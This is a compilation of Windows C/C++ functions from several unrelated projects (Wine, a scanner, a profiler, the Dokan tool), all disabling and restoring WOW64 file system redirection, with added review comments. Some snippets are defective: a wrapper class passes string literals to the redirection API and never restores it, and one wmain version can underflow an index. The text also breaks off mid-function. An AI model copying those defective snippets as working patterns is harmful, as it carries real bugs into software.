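/* Launch rpcss.exe from the system directory.
 *
 * Returns the CreateProcessW result: TRUE if the process was created, FALSE
 * otherwise. FALSE is also returned when the system directory path cannot be
 * obtained or does not leave room for the "\rpcss.exe" suffix.
 */
static BOOL start_rpcss(void)
{
    static const WCHAR rpcss[] = {'\\','r','p','c','s','s','.','e','x','e',0};
    PROCESS_INFORMATION pi;
    STARTUPINFOW si;
    WCHAR cmd[MAX_PATH];
    UINT dir_size = MAX_PATH - sizeof(rpcss)/sizeof(WCHAR);
    UINT dir_len;
    BOOL rslt;
    BOOL redir_disabled;
    void *redir = NULL;

    TRACE("\n");

    /* Size the structure from the variable itself so it always matches the
     * STARTUPINFOW that is passed to CreateProcessW. */
    ZeroMemory(&si, sizeof(si));
    si.cb = sizeof(si);

    /* GetSystemDirectoryW returns 0 on failure and the required size when the
     * buffer is too small; in both cases cmd is not a usable path and must
     * not be appended to. */
    dir_len = GetSystemDirectoryW( cmd, dir_size );
    if (!dir_len || dir_len >= dir_size) return FALSE;
    lstrcatW( cmd, rpcss );

    /* The redirection state belongs to the calling thread, so it is disabled
     * only around the process creation. The full path is passed as the
     * application name, so the image is not searched for along the path. */
    redir_disabled = Wow64DisableWow64FsRedirection( &redir );
    rslt = CreateProcessW( cmd, cmd, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi );
    /* Only hand back a cookie that the disable call actually produced. */
    if (redir_disabled) Wow64RevertWow64FsRedirection( redir );

    if (rslt)
    {
        CloseHandle(pi.hProcess);
        CloseHandle(pi.hThread);
        Sleep(100);
    }

    return rslt;
}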
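/* Thread function that counts the entries under on_demand->root_path and
 * publishes the total in on_demand->scan->to_scan_count.
 *
 * data is the struct a6o_on_demand describing the scan. Always returns NULL.
 */
static gpointer count_thread_fun(gpointer data)
{
	struct a6o_on_demand *on_demand = (struct a6o_on_demand *)data;
	int recurse = on_demand->flags & ARMADITO_SCAN_RECURSE;
	int count = 0;
#ifdef _WIN32
	void *OldValue = NULL;
	/* A failure here is not treated as fatal: the count is still computed,
	 * with whatever redirection state the thread already has. The call is
	 * expected to fail when the process is not running under WOW64
	 * (TODO confirm for the supported targets), and returning early would
	 * leave to_scan_count unset. */
	BOOL redir_disabled = Wow64DisableWow64FsRedirection(&OldValue);
#endif

	os_dir_map(on_demand->root_path, recurse, count_entry, &count);

	/* set the counter inside the a6o_scan struct only at the end, so */
	/* that the scan function does not see the intermediate values, only the last one */
	on_demand->scan->to_scan_count = count;

#ifdef _WIN32
	/* Revert only with a cookie that the disable call actually produced. */
	if (redir_disabled)
		Wow64RevertWow64FsRedirection(OldValue);
#endif

	return NULL;
}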
// Constructor: initialises m_OldValue to NULL, takes a module reference on
// Kernel32.dll and, if that succeeded, makes the call shown below.
DisableWow64FileSystemRedirection::DisableWow64FileSystemRedirection(void) : m_OldValue(NULL)
{
    // NOTE(review): LOAD_WITH_ALTERED_SEARCH_PATH is documented for absolute
    // paths; with a bare file name such as "Kernel32.dll" its behaviour is
    // documented as undefined. Kernel32 is normally already mapped into the
    // process, so a plain module-handle lookup would avoid the question.
    m_hModule = ::LoadLibraryEx(L"Kernel32.dll", NULL, LOAD_WITH_ALTERED_SEARCH_PATH);
    if (m_hModule)
        // NOTE(review): as written this passes a string literal where the API
        // takes a pointer that receives the old redirection value, and
        // m_OldValue is never filled in. Presumably a by-name export lookup on
        // m_hModule was intended here; confirm against the original file.
        Wow64DisableWow64FsRedirection("Wow64DisableWow64FsRedirection");
}
// Destructor: when the module reference was obtained, makes the call shown
// below and then releases the module reference.
DisableWow64FileSystemRedirection::~DisableWow64FileSystemRedirection(void)
{
    if (m_hModule)
    {
        // NOTE(review): this line names the disable function again and passes
        // the string "Wow64RevertWow64FsRedirection"; nothing visible here
        // restores the redirection state or uses m_OldValue. Presumably the
        // revert export was meant to be resolved and called with the saved
        // value; confirm against the original file. If the state is not
        // restored, redirection stays disabled on this thread after the
        // object is destroyed.
        Wow64DisableWow64FsRedirection("Wow64RevertWow64FsRedirection");
        ::FreeLibrary(m_hModule);
    }
}
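// Disables WOW64 file system redirection for the calling thread, once.
//
// Does nothing when the ifRedirFrobid flag is already set or when
// GetSystemBits() does not report 64 (presumably the OS bitness; verify
// against GetSystemBits). The previous redirection value is stored in oldValue.
void CSystem::ForbidRedir()
{
    if (ifRedirFrobid == false && GetSystemBits() == 64)
    {
        // Record the state only when the call succeeded: oldValue is valid
        // only in that case, and a flag set after a failed call would claim
        // that redirection is off when it is not.
        if (Wow64DisableWow64FsRedirection(&oldValue))
        {
            ifRedirFrobid = true;
        }
    }
}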
//----------------------------------------------- void SJ_Menu_Begin( char lastState ) { g_timeToNextKey = 0.5f;//s_keyTime*0.5f; ZeroMemory( s_availSkins, sizeof(s_availSkins) ); s_curSkin = 0; // -- Retrieve all available skins wchar_t path[MAX_PATH]; GetCurrentDirectory(MAX_PATH-1, path); _swprintf( g_txt, L"%s\\*", path ); #ifdef _WIN64 PVOID OldValue = NULL; Wow64DisableWow64FsRedirection( &OldValue ); #endif WIN32_FIND_DATA ffdata; HANDLE hFind = FindFirstFile( g_txt, &ffdata ); if ( hFind != INVALID_HANDLE_VALUE ) { do { if ( ffdata.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY ) { static const wchar_t* keypaths[] = { L"config.txt", L"levels", L"levels\\easy", L"levels\\medium", L"levels\\hard", L"levels\\extreme", L"sprites" }; bool validSkin = true; for ( int i = 0; i < 7 && validSkin; ++i ) { _swprintf( g_txt, L"%s\\%s\\%s", path, ffdata.cFileName, keypaths[i] ); validSkin = validSkin && _waccess_s( g_txt, 0 ) == 0; } if ( validSkin && s_curSkin < MAX_AVAILSKINS ) { wcscpy_s( s_availSkins[s_curSkin], ffdata.cFileName ); if ( _wcsicmp( ffdata.cFileName, DEFAULT_SKIN ) == 0 ) s_skinValue = s_curSkin; ++s_curSkin; } }else { } }while ( FindNextFile(hFind,&ffdata)!=0 ); FindClose(hFind); } #ifdef _WIN64 if ( OldValue ) Wow64RevertWow64FsRedirection( OldValue ); #endif Menu_UpdateLabels(); }
// Returns a path at which the module file exists.
//
// Starts from originalPath; while the current candidate does not exist, the
// user is asked to locate the file through a file dialog parented to pParent.
// Returns QString::null when the user dismisses the dialog without a choice.
// On Windows, WOW64 file system redirection is disabled for the duration of
// the search when the process runs under WOW64, and restored before returning.
QString FindModuleFile(QWidget* pParent, const QString& originalPath)
{
    const QFileInfo originalInfo(originalPath);
    QString candidate = originalPath;

#if AMDT_BUILD_TARGET == AMDT_WINDOWS_OS
    PVOID savedRedirection = nullptr;
    BOOL redirectionOff = FALSE;
    IsWow64Process(GetCurrentProcess(), &redirectionOff);

    if (redirectionOff)
    {
        redirectionOff = static_cast<BOOL>(Wow64DisableWow64FsRedirection(&savedRedirection));
    }

    // NOTE(review): redirection stays disabled while the file dialog below is
    // open. The setting affects every file operation on this thread, DLL
    // loading included, so the window is wider than the existence check needs.
#endif

    bool located = true;

    while (!QFile::exists(candidate))
    {
        // Not found: let the user point at the file and test that choice next.
        candidate = QFileDialog::getOpenFileName(pParent,
                                                 "Locate module file " + originalInfo.fileName(),
                                                 originalPath,
                                                 "Module File (*.*)");

        if (candidate.isEmpty())
        {
            located = false;
            break;
        }
    }

#if AMDT_BUILD_TARGET == AMDT_WINDOWS_OS

    if (redirectionOff)
    {
        Wow64RevertWow64FsRedirection(savedRedirection);
    }

#endif

    if (!located)
    {
        return QString::null;
    }

    return candidate;
}
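// Initialises the shared profiling objects if needed and, when the PCORE
// driver handle is not yet set, opens the PCORE, CpuProf and AMDTPwrProf
// drivers by name under "<system directory>\drivers\".
// WOW64 file system redirection is disabled around the three open calls when
// the process runs under WOW64, and restored afterwards.
void LoadDrivers()
{
    if (!gCAProfAPISharedMapFile)
    {
        InitializeProfAPISharedObj();
    }

    if (!gPwrProfSharedMapFile)
    {
        InitializePwrProfSharedObj();
    }

    if (!gDriverHandlePcore)
    {
        wchar_t drivername[nBufferSize + 1];
        wchar_t systemDir[MAX_PATH];
        systemDir[0] = '\0';
        // NOTE(review): the result is not checked; on failure systemDir stays
        // empty and the names below start with "\drivers\...".
        GetSystemDirectory(systemDir, MAX_PATH);

        PVOID oldValue = nullptr;
        // Start from FALSE and trust the out value only when the query
        // succeeded; it was previously read uninitialised on failure.
        BOOL isSys64 = FALSE;

        if (!IsWow64Process(GetCurrentProcess(), &isSys64))
        {
            isSys64 = FALSE;
        }

        if (isSys64)
        {
            // From here on isSys64 means "redirection was disabled and has to
            // be reverted".
            isSys64 = Wow64DisableWow64FsRedirection(&oldValue);
        }

        swprintf(drivername, nBufferSize, L"%s%s", systemDir, L"\\drivers\\PCORE");
        OpenAmdDriver((LPCTSTR)drivername, &gDriverHandlePcore);

        swprintf(drivername, nBufferSize, L"%s%s", systemDir, L"\\drivers\\CpuProf");
        OpenAmdDriver((LPCTSTR)drivername, &gDriverHandleCAProf);

        // Install the Power Profiler driver only on AMD supported platforms
        // NOTE(review): no platform check is visible in this function.
        swprintf(drivername, nBufferSize, L"%s%s", systemDir, L"\\drivers\\AMDTPwrProf");
        OpenAmdDriver((LPCTSTR)drivername, &gDriverHandlePwrProf);

        if (isSys64)
        {
            Wow64RevertWow64FsRedirection(oldValue);
        }
    }
}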
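/* Run winemenubuilder.exe from the system directory with the given arguments.
 *
 * args is appended verbatim to the executable path to form the command line,
 * so it has to carry its own leading separator.
 * Returns the CreateProcessW result; FALSE is also returned when the system
 * directory path cannot be obtained or the command line cannot be allocated.
 */
static BOOL run_winemenubuilder( const WCHAR *args )
{
    static const WCHAR menubuilder[] = {'\\','w','i','n','e','m','e','n','u','b','u','i','l','d','e','r','.','e','x','e',0};
    LONG len;
    LPWSTR buffer;
    STARTUPINFOW si;
    PROCESS_INFORMATION pi;
    BOOL ret;
    BOOL redir_disabled;
    WCHAR app[MAX_PATH];
    UINT dir_size = MAX_PATH - sizeof(menubuilder)/sizeof(WCHAR);
    UINT dir_len;
    void *redir = NULL;

    /* GetSystemDirectoryW returns 0 on failure and the required size when the
     * buffer is too small; app is not a usable path in either case. */
    dir_len = GetSystemDirectoryW( app, dir_size );
    if (!dir_len || dir_len >= dir_size) return FALSE;
    strcatW( app, menubuilder );

    len = (strlenW( app ) + strlenW( args ) + 1) * sizeof(WCHAR);
    buffer = heap_alloc( len );
    if( !buffer )
        return FALSE;

    strcpyW( buffer, app );
    strcatW( buffer, args );

    TRACE("starting %s\n",debugstr_w(buffer));

    memset(&si, 0, sizeof(si));
    si.cb = sizeof(si);

    /* Redirection is a per-thread setting, so it is switched off only around
     * the process creation. The full path is passed as the application name,
     * so the image to run does not depend on how the command line parses. */
    redir_disabled = Wow64DisableWow64FsRedirection( &redir );
    ret = CreateProcessW( app, buffer, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi );
    /* Only hand back a cookie that the disable call actually produced. */
    if (redir_disabled) Wow64RevertWow64FsRedirection( redir );

    heap_free( buffer );

    if (ret)
    {
        CloseHandle( pi.hProcess );
        CloseHandle( pi.hThread );
    }

    return ret;
}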
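/***********************************************************************
 *		ExitWindowsEx (USER32.@)
 *
 * Starts wineboot.exe from the system directory with options derived from
 * flags: " --kill" for EWX_FORCE, otherwise " --end-session" (plus " --force"
 * for EWX_FORCEIFHUNG), and " --shutdown" unless EWX_REBOOT is set.
 * reason is not used here.
 *
 * Returns TRUE when the process was created, FALSE otherwise (including when
 * the system directory path cannot be obtained).
 */
BOOL WINAPI ExitWindowsEx( UINT flags, DWORD reason )
{
    static const WCHAR winebootW[]    = { '\\','w','i','n','e','b','o','o','t','.','e','x','e',0 };
    static const WCHAR killW[]        = { ' ','-','-','k','i','l','l',0 };
    static const WCHAR end_sessionW[] = { ' ','-','-','e','n','d','-','s','e','s','s','i','o','n',0 };
    static const WCHAR forceW[]       = { ' ','-','-','f','o','r','c','e',0 };
    static const WCHAR shutdownW[]    = { ' ','-','-','s','h','u','t','d','o','w','n',0 };

    WCHAR app[MAX_PATH];
    WCHAR cmdline[MAX_PATH + 64];
    PROCESS_INFORMATION pi;
    STARTUPINFOW si;
    UINT dir_size = MAX_PATH - sizeof(winebootW)/sizeof(WCHAR);
    UINT dir_len;
    BOOL created;
    BOOL redir_disabled;
    void *redir = NULL;

    /* GetSystemDirectoryW returns 0 on failure and the required size when the
     * buffer is too small; app is not a usable path in either case. */
    dir_len = GetSystemDirectoryW( app, dir_size );
    if (!dir_len || dir_len >= dir_size) return FALSE;
    strcatW( app, winebootW );

    /* The option strings add at most 33 characters, within the 64 spare
     * characters of cmdline. */
    strcpyW( cmdline, app );
    if (flags & EWX_FORCE) lstrcatW( cmdline, killW );
    else
    {
        lstrcatW( cmdline, end_sessionW );
        if (flags & EWX_FORCEIFHUNG) lstrcatW( cmdline, forceW );
    }
    if (!(flags & EWX_REBOOT)) lstrcatW( cmdline, shutdownW );

    memset( &si, 0, sizeof si );
    si.cb = sizeof si;

    /* Redirection is a per-thread setting; it is switched off only around the
     * process creation and restored on both outcomes, using only a cookie
     * that the disable call actually produced. */
    redir_disabled = Wow64DisableWow64FsRedirection( &redir );
    created = CreateProcessW( app, cmdline, NULL, NULL, FALSE, DETACHED_PROCESS, NULL, NULL, &si, &pi );
    if (redir_disabled) Wow64RevertWow64FsRedirection( redir );

    if (!created)
    {
        ERR( "Failed to run %s\n", debugstr_w(cmdline) );
        return FALSE;
    }
    CloseHandle( pi.hProcess );
    CloseHandle( pi.hThread );
    return TRUE;
}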
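/* the thread function called by the thread pool, in case of threaded scan
 *
 * data is the strdup'ed path of the file to scan; this function takes
 * ownership of it and frees it on every path. user_data is the
 * struct a6o_on_demand describing the scan. The file is scanned unless the
 * `cancel` flag is set.
 */
static void scan_entry_thread_fun(gpointer data, gpointer user_data)
{
	struct a6o_on_demand *on_demand = (struct a6o_on_demand *)user_data;
	char *path = (char *)data;
#ifdef _WIN32
	void *OldValue = NULL;
	/* A failure here no longer ends the function: returning early leaked
	 * `path` and silently dropped the file from the scan. The file is
	 * scanned with whatever redirection state the thread already has; the
	 * call is expected to fail when the process is not running under WOW64
	 * (TODO confirm for the supported targets). */
	BOOL redir_disabled = Wow64DisableWow64FsRedirection(&OldValue);
#endif

	if (!cancel)
		scan_file(on_demand, path);

	/* path was strdup'ed, so free it */
	free(path);

#ifdef _WIN32
	/* The setting is per thread and this function runs on a thread pool
	 * thread, so it is restored here, and only with a cookie that the
	 * disable call actually produced. */
	if (redir_disabled)
		Wow64RevertWow64FsRedirection(OldValue);
#endif
}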
/* Entry point of the boot helper.
 *
 * Sets the current directory to the Windows directory, re-launches itself
 * when running under WOW64, parses the command line options and then runs
 * the requested session-end / shutdown steps or the start-up sequence
 * (registry key creation, pending renames, Run* registry keys, services,
 * prefix update, startup items).
 *
 * Returns 0 on success or after printing usage for 'h', 1 for an unknown
 * option or when ending the session fails.
 */
int main( int argc, char *argv[] )
{
    /* NOTE(review): declared here but not called anywhere in this function. */
    extern HANDLE CDECL __wine_make_process_system(void);
    static const WCHAR RunW[] = {'R','u','n',0};
    static const WCHAR RunOnceW[] = {'R','u','n','O','n','c','e',0};
    static const WCHAR RunServicesW[] = {'R','u','n','S','e','r','v','i','c','e','s',0};
    static const WCHAR RunServicesOnceW[] = {'R','u','n','S','e','r','v','i','c','e','s','O','n','c','e',0};
    static const WCHAR wineboot_eventW[] = {'_','_','w','i','n','e','b','o','o','t','_','e','v','e','n','t',0};

    int optc;
    int end_session = 0, force = 0, init = 0, kill = 0, restart = 0, shutdown = 0, update = 0;
    HANDLE event;
    SECURITY_ATTRIBUTES sa;
    BOOL is_wow64;

    /* First, set the current directory to the Windows directory; a failure
     * is logged and execution continues. */
    GetWindowsDirectoryW( windowsdir, MAX_PATH );
    if( !SetCurrentDirectoryW( windowsdir ) )
        WINE_ERR("Cannot set the dir to %s (%d)\n", wine_dbgstr_w(windowsdir), GetLastError() );

    /* Under WOW64, start the same file name again with file system
     * redirection disabled, wait for that process and exit with its exit
     * code. If the re-launch fails, the error is logged, redirection is
     * restored and this process carries on itself. */
    if (IsWow64Process( GetCurrentProcess(), &is_wow64 ) && is_wow64)
    {
        STARTUPINFOW si;
        PROCESS_INFORMATION pi;
        WCHAR filename[MAX_PATH];
        void *redir;
        DWORD exit_code;

        memset( &si, 0, sizeof(si) );
        si.cb = sizeof(si);
        GetModuleFileNameW( 0, filename, MAX_PATH );

        /* NOTE(review): the result of the disable call is not checked; redir
         * is passed to the revert call below either way. */
        Wow64DisableWow64FsRedirection( &redir );
        if (CreateProcessW( filename, GetCommandLineW(), NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi ))
        {
            WINE_TRACE( "restarting %s\n", wine_dbgstr_w(filename) );
            WaitForSingleObject( pi.hProcess, INFINITE );
            GetExitCodeProcess( pi.hProcess, &exit_code );
            /* Does not return, so the handles in pi are not closed here. */
            ExitProcess( exit_code );
        }
        else WINE_ERR( "failed to restart 64-bit %s, err %d\n", wine_dbgstr_w(filename), GetLastError() );
        Wow64RevertWow64FsRedirection( redir );
    }

    /* Each recognised option sets its flag; 'h' and '?' print usage and end
     * the program. */
    while ((optc = getopt_long(argc, argv, short_options, long_options, NULL )) != -1)
    {
        switch(optc)
        {
        case 'e': end_session = 1; break;
        case 'f': force = 1; break;
        case 'i': init = 1; break;
        case 'k': kill = 1; break;
        case 'r': restart = 1; break;
        case 's': shutdown = 1; break;
        case 'u': update = 1; break;
        case 'h': usage(); return 0;
        case '?': usage(); return 1;
        }
    }

    /* Ending the session: with 'k' all desktops are shut down, otherwise the
     * windows are asked to close; a failure of either stops here. */
    if (end_session)
    {
        if (kill)
        {
            if (!shutdown_all_desktops( force )) return 1;
        }
        else if (!shutdown_close_windows( force )) return 1;
    }

    if (kill) kill_processes( shutdown );

    /* A plain shutdown ends here; everything below is the start-up sequence. */
    if (shutdown) return 0;

    sa.nLength = sizeof(sa);
    sa.lpSecurityDescriptor = NULL;
    sa.bInheritHandle = TRUE;  /* so that services.exe inherits it */
    /* NOTE(review): the handle is used without a NULL check, and the named
     * event is created with a NULL security descriptor. */
    event = CreateEventW( &sa, TRUE, FALSE, wineboot_eventW );
    ResetEvent( event );  /* in case this is a restart */

    create_hardware_registry_keys();
    create_dynamic_registry_keys();
    create_environment_registry_keys();
    wininit();
    pendingRename();

    ProcessWindowsFileProtection();
    ProcessRunKeys( HKEY_LOCAL_MACHINE, RunServicesOnceW, TRUE, FALSE );

    if (init || (kill && !restart))
    {
        ProcessRunKeys( HKEY_LOCAL_MACHINE, RunServicesW, FALSE, FALSE );
        start_services_process();
    }
    if (init || update) update_wineprefix( update );

    create_volatile_environment_registry_key();

    ProcessRunKeys( HKEY_LOCAL_MACHINE, RunOnceW, TRUE, TRUE );

    /* The per-machine and per-user Run keys and the startup items are
     * processed only when neither 'i' nor 'r' was given. */
    if (!init && !restart)
    {
        ProcessRunKeys( HKEY_LOCAL_MACHINE, RunW, FALSE, FALSE );
        ProcessRunKeys( HKEY_CURRENT_USER, RunW, FALSE, FALSE );
        ProcessStartupItems();
    }

    WINE_TRACE("Operation done\n");

    /* Signal the event created above now that the sequence is complete. */
    SetEvent( event );
    return 0;
}
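// Starts a process and optionally waits for it.
//
// wExecMode            EXEC_MODE_CMD runs the command through
//                      "<system directory>\cmd.exe /C"; any other value lets
//                      CreateProcess take the executable from the command line.
// wExecStyle           show-window value placed in STARTUPINFO.
// pwszArg0             first part of the command line (may be NULL).
// pwszParameter        appended to the command line when non-empty (may be NULL).
// pwszWorkingDirectory working directory for the new process (NULL = inherit).
// dwPID                receives the new process id, or 0 when creation fails.
// dwWait               if > 0, time in milliseconds to wait for the process.
// lpdwExitCode         if non-NULL, receives the exit code of the process.
// bIsExist             not used by this function.
//
// Returns the Win32 error code when process creation fails, the wait result
// (or the error code for WAIT_FAILED) when the wait does not end with
// WAIT_OBJECT_0, and ERROR_SUCCESS otherwise. A GetExitCodeProcess failure is
// logged but still reported as ERROR_SUCCESS, as before.
//
// Caveats for callers:
//  - The command line is limited to MAX_PATH characters; the *_s functions
//    invoke the CRT invalid-parameter handler when that is exceeded.
//  - Outside EXEC_MODE_CMD no application name is passed, so an executable
//    path containing spaces has to be quoted inside pwszArg0.
//  - In EXEC_MODE_CMD the text is interpreted by cmd.exe; do not build it
//    from untrusted input.
DWORD RunProcess(
    __in WORD wExecMode,
    __in WORD wExecStyle,
    __in const wchar_t * pwszArg0,
    __in const wchar_t * pwszParameter,
    __in const wchar_t * pwszWorkingDirectory,
    __out volatile DWORD & dwPID,
    __in DWORD dwWait,
    LPDWORD lpdwExitCode,
    BOOL * bIsExist)
{
    DWORD ret = ERROR_SUCCESS;
    STARTUPINFO si;
    PROCESS_INFORMATION pi;
    wchar_t wszCmd[MAX_PATH] = { 0, };
    wchar_t wszCommandLine[MAX_PATH] = { 0, };
    wchar_t *pwszAppName;
    wchar_t tmp[TMPBUF];
    PVOID oldValue = NULL;

    ZeroMemory(&si, sizeof(si));
    ZeroMemory(&pi, sizeof(pi));

    si.cb = sizeof(si);
    si.dwFlags = STARTF_USESHOWWINDOW;
    si.wShowWindow = wExecStyle;

    if (wExecMode == EXEC_MODE_CMD)
    {
        // cmd.exe is addressed by its full path in the system directory.
        TCHAR systemDirPath[MAX_PATH] = _T("");
        GetSystemDirectory(systemDirPath, sizeof(systemDirPath) / sizeof(_TCHAR));
        swprintf_s(wszCmd, MAX_PATH, L"%s", systemDirPath);
        wcscat_s(wszCmd, MAX_PATH, L"\\cmd.exe");
        pwszAppName = wszCmd;
    }
    else
    {
        pwszAppName = NULL;
    }

    if (pwszArg0)
    {
        swprintf_s(wszCommandLine, MAX_PATH, L"%s", pwszArg0);
    }

    if (pwszParameter)
    {
        if (wcslen(pwszParameter) > 0)
        {
            if (wcslen(wszCommandLine) > 0)
            {
                wcscat_s(wszCommandLine, MAX_PATH, L" ");
            }
            if (wExecMode == EXEC_MODE_CMD)
            {
                wcscat_s(wszCommandLine, MAX_PATH, L"/C ");
            }
            wcscat_s(wszCommandLine, MAX_PATH, pwszParameter);
        }
    }

    // Redirection is a per-thread setting that affects every file operation,
    // so it is switched off only around CreateProcess. The error code is
    // captured before the revert call can change it, and the revert uses only
    // a cookie that the disable call actually produced.
    const BOOL redirDisabled = Wow64DisableWow64FsRedirection(&oldValue);
    const BOOL created = CreateProcess(pwszAppName,
        wszCommandLine,         // Command line
        NULL,                   // Process handle not inheritable.
        NULL,                   // Thread handle not inheritable.
        FALSE,                  // Set handle inheritance to FALSE.
        0,                      // No creation flags.
        NULL,                   // Use parent's environment block.
        pwszWorkingDirectory,   // Working directory (NULL = parent's).
        &si,                    // Pointer to STARTUPINFO structure.
        &pi);                   // Pointer to PROCESS_INFORMATION structure.
    const DWORD createError = created ? ERROR_SUCCESS : GetLastError();
    if (redirDisabled)
    {
        Wow64RevertWow64FsRedirection(oldValue);
    }

    if (!created)
    {
        ret = createError;
        dwPID = 0;
        wsprintf(tmp, L"CreateProcess faild: GetLastError %d\n", ret);
        WriteLog(tmp);
        return ret;
    }

    dwPID = pi.dwProcessId;

    if (dwWait > 0)
    {
        ret = WaitForSingleObject(pi.hProcess, dwWait);
        if (ret != WAIT_OBJECT_0)
        {
            if (ret == WAIT_FAILED)
            {
                ret = GetLastError();
            }
            // The process itself is left running; only the handles are released.
            CloseHandle(pi.hProcess);
            CloseHandle(pi.hThread);
            wsprintf(tmp, L"CreateProcess WaitForSingleObject faild: Error %d\n", ret);
            WriteLog(tmp);
            return ret;
        }
    }

    if (lpdwExitCode)
    {
        if (!GetExitCodeProcess(pi.hProcess, lpdwExitCode))
        {
            ret = GetLastError();
            wsprintf(tmp, L"CreateProcess GetExitCodeProcess faild: GetLastError %d\n", ret);
            WriteLog(tmp);
        }
    }

    CloseHandle(pi.hProcess);
    CloseHandle(pi.hThread);

    return ERROR_SUCCESS;
}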
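/* Entry point of the control tool.
 *
 * Prints the driver path, reads the option with GetOption(argc, argv, 1) and
 * dispatches on it:
 *   i / r  install / remove the driver ('d') or the network provider ('n'),
 *          selected by the first character of argv[2]
 *   d      set the debug mode to the digit in argv[2]
 *   u      unmount argv[2]
 *   l      list the mount points
 *   v      print version information
 * i, r, d and u are refused without administrator rights. Options that need
 * argv[2] fall through to the "Unknown option" message when it is missing.
 *
 * Returns the result of the install / remove / unmount / usage helper where
 * one is called, EXIT_FAILURE for a refused or failed setup step, and
 * EXIT_SUCCESS otherwise (including for an unknown option, as before).
 */
int __cdecl wmain(int argc, PWCHAR argv[]) {
  size_t i;
  WCHAR fileName[MAX_PATH];
  WCHAR driverFullPath[MAX_PATH] = {0};
  PVOID wow64OldValue;
  BOOL isAdmin;

  isAdmin = IsUserAnAdmin();

  DokanUseStdErr(TRUE); // Set dokan library debug output

  /* Disable system32 redirection. It is never reverted in this function, so
   * it stays off for this thread until the process exits. */
  Wow64DisableWow64FsRedirection(&wow64OldValue);

  // setlocale(LC_ALL, "");

  /* Keep only the directory part of the module path. An empty string is used
   * when the path cannot be obtained, and the scan starts at the terminator,
   * so an empty name can no longer underflow the index. */
  if (GetModuleFileName(NULL, fileName, MAX_PATH) == 0) {
    fileName[0] = L'\0';
  }

  // search the last "\"
  for (i = wcslen(fileName); i > 0 && fileName[i] != L'\\'; --i) {
    ;
  }
  fileName[i] = L'\0';

  ExpandEnvironmentStringsW(DOKAN_DRIVER_FULL_PATH, driverFullPath, MAX_PATH);

  fwprintf(stdout, L"Driver path: '%s'\n", driverFullPath);

  WCHAR option = GetOption(argc, argv, 1);
  if (option == L'\0' || option == L'?') {
    return ShowUsage();
  }

  if (!isAdmin &&
      (option == L'i' || option == L'r' || option == L'd' || option == L'u')) {
    fprintf(stderr, "Admin rights required to process this operation\n");
    return EXIT_FAILURE;
  }

  switch (option) {
  // Admin rights required
  case L'i': {
    /* argv[2] is NULL when only the option was given; do not dereference it. */
    if (argc < 3) {
      goto DEFAULT;
    }
    WCHAR type = towlower(argv[2][0]);
    if (type == L'd') {
      return InstallDriver(driverFullPath);
    } else if (type == L'n') {
      if (DokanNetworkProviderInstall())
        fprintf(stdout, "network provider install ok\n");
      else
        fprintf(stderr, "network provider install failed\n");
    } else {
      goto DEFAULT;
    }
  } break;

  case L'r': {
    if (argc < 3) {
      goto DEFAULT;
    }
    WCHAR type = towlower(argv[2][0]);
    if (type == L'd') {
      return DeleteDokanService(DOKAN_DRIVER_SERVICE);
    } else if (type == L'n') {
      if (DokanNetworkProviderUninstall())
        fprintf(stdout, "network provider remove ok\n");
      else
        fprintf(stderr, "network provider remove failed\n");
    } else {
      goto DEFAULT;
    }
  } break;

  case L'd': {
    if (argc < 3) {
      goto DEFAULT;
    }
    WCHAR type = towlower(argv[2][0]);
    if (L'0' > type || type > L'9')
      goto DEFAULT;

    ULONG mode = type - L'0';
    if (DokanSetDebugMode(mode)) {
      fprintf(stdout, "set debug mode ok\n");
    } else {
      fprintf(stderr, "set debug mode failed\n");
    }
  } break;

  case L'u': {
    if (argc < 3) {
      goto DEFAULT;
    }
    return Unmount(argv[2]);
  } break;

  // No admin rights required
  case L'l': {
    ULONG nbRead = 0;
    PDOKAN_CONTROL dokanControl =
        malloc(DOKAN_MAX_INSTANCES * sizeof(*dokanControl));
    if (dokanControl == NULL) {
      fprintf(stderr, "Failed to allocate dokanControl\n");
      return EXIT_FAILURE;
    }

    ZeroMemory(dokanControl, DOKAN_MAX_INSTANCES * sizeof(*dokanControl));
    if (DokanGetMountPointList(dokanControl, DOKAN_MAX_INSTANCES, FALSE,
                               &nbRead)) {
      fwprintf(stdout, L" Mount points: %d\n", nbRead);
      for (unsigned int p = 0; p < nbRead; ++p) {
        fwprintf(stdout, L" %u# MountPoint: %s - UNC: %s - DeviceName: %s\n",
                 p, dokanControl[p].MountPoint, dokanControl[p].UNCName,
                 dokanControl[p].DeviceName);
      }
    } else {
      fwprintf(stderr, L" Cannot retrieve mount point list.\n");
    }
    free(dokanControl);
  } break;

  case L'v': {
    fprintf(stdout, "dokanctl : %s %s\n", __DATE__, __TIME__);
    fprintf(stdout, "Dokan version : %d\n", DokanVersion());
    fprintf(stdout, "Dokan driver version : 0x%lx\n", DokanDriverVersion());
  } break;

  DEFAULT:
  default:
    fprintf(stderr, "Unknown option - Use /? to show usage\n");
  }

  return EXIT_SUCCESS;
}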
/* Entry point of the control tool.
 *
 * Prints the driver path, then handles 'v' (version information) and 'u'
 * (unmount, optionally forced with 'f' as the option at index 3) before the
 * general form "/<letter> <type>" is required. The remaining letters are
 * i / r (install / remove the driver 'd' or the network provider 'n'),
 * d (set the debug mode to a digit) and l (list the mount points).
 *
 * Returns the result of the install / remove / unmount / usage helper where
 * one is called and EXIT_SUCCESS otherwise, including for an unknown option.
 */
int __cdecl wmain(int argc, PWCHAR argv[]) {
  size_t i;
  WCHAR fileName[MAX_PATH];
  WCHAR driverFullPath[MAX_PATH] = {0};
  WCHAR type;
  PVOID wow64OldValue;

  DokanUseStdErr(TRUE); // Set dokan library debug output

  // Disable system32 redirection. The result is not checked and the setting
  // is never reverted in this function, so it lasts until the process exits.
  Wow64DisableWow64FsRedirection(&wow64OldValue); // Disable system32 direct

  // setlocale(LC_ALL, "");

  // NOTE(review): the return value is not checked; if the call fails,
  // fileName is uninitialised, and for an empty string the index below starts
  // at wcslen() - 1, which wraps around for a size_t.
  GetModuleFileName(NULL, fileName, MAX_PATH);

  // search the last "\" and cut the string there (directory part only)
  for (i = wcslen(fileName) - 1; i > 0 && fileName[i] != L'\\'; --i) {
    ;
  }
  fileName[i] = L'\0';

  ExpandEnvironmentStringsW(DOKAN_DRIVER_FULL_PATH, driverFullPath, MAX_PATH);

  fwprintf(stdout, L"Driver path: '%s'\n", driverFullPath);

  if (GetOption(argc, argv, 1) == L'v') {
    fprintf(stdout, "dokanctl : %s %s\n", __DATE__, __TIME__);
